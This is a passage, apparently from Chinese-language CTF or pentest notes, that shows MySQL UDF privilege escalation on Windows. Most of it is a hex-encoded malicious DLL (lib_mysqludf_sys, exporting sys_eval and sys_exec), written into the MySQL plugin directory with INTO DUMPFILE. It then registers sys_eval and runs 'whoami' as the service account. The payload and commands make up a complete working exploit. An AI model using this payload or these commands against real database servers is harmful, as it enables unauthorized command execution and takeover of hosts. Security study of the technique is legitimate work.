004d5356435238302e646c6c00004c6f61644c69627261727941000047657450726f634164647265737300005669727475616c50726f7465637400005669727475616c416c6c6f6300005669727475616c46726565000000667265650000000000000000a727a15a0000000074b30000010000001200000012000000c0b2000008b3000050b300007010000060100000001000008015000060100000701500002014000060100000901300000014000060100000901300003011000060100000c010000000130000e0120000a011000089b300009fb30000bcb30000d7b30000e3b30000f6b3000007b4000010b4000020b400002eb4000037b4000047b4000055b400005db400006cb4000079b4000081b4000090b4000000000100020003000400050006000700080009000a000b000c000d000e000f00100011006c69625f6d7973716c7564665f7379732e646c6c006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f62696e6576616c007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f6576616c007379735f6576616c5f6465696e6974007379735f6576616c5f696e6974007379735f65786563007379735f657865635f6465696e6974007379735f657865635f696e6974007379735f676574007379735f6765745f6465696e6974007379735f6765745f696e6974007379735f736574007379735f7365745f6465696e6974007379735f7365745f696e69740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 INTO DUMPFILE 'C:\\Program Files\\MySQL\\MySQL Server 8.0\\lib\\plugin\\udf.dll';
- 创建自定义函数
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';
#查看mysql 函数里面是否新增了 sys_eval:
select * from mysql.func;
select sys_eval('whoami'); #nt authority\network service
#删除自定义函数
drop function sys_eval;
参考
或许我该复现一下2024的羊城杯?